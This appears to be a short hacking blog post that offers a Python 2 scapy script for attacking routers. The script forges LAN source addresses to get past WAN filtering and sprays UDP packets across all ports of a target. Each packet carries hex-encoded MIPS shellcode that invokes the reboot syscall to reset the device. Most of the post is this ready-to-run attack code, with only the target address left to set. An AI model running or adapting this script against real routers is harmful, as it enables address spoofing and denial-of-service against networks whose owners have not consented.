downtechs
Loading...





Remote UDP Fuzzer

Remote UDP Fuzzer




Alot of administrators neglect to filter LAN traffic from a WAN interface. I made a script that can access UDP ports on a router that spoofs the src ip address. This tricks the router into thinking that the packet comes from the LAN side of the network so it should be able to access the UDP ports. I included an example buffer overflow script which has a MIPs based reset router shellcode.

Code :-

#!/usr/bin/env python2
#
# Remote UDP Mips Fuzzer - Reset device shellcode
# 
# usage: Edit the rumf.py script and change the destination server (i.dst)
#
from scapy.all import * 
print("Remote UDP Mips Fuzzer - Reset Shellcode")
for num in range(0,10):
  data = "00" * int(str(num))
  sc = "3c06432134c6fedc3c05281234a519693c04fee13484dead24020ff80101010c"
  a = data+sc
  for ip in range(0,255):
    for port in range(0,65535):
      i=IP()
      i.dst="Change_This"    
      i.src="10.0"+"."+str(ip)+"."+str(ip)
      udp=UDP()
      udp.sport=int(str(port))
      udp.dport=int(str(port))
      sendp(i/udp/a)
tools 3572542729019318204

Post a Comment Default Comments Disqus Comments

emo-but-icon

Home item

Find Us On Facebook

Follow Us On Twitter

Popular Posts

Random Posts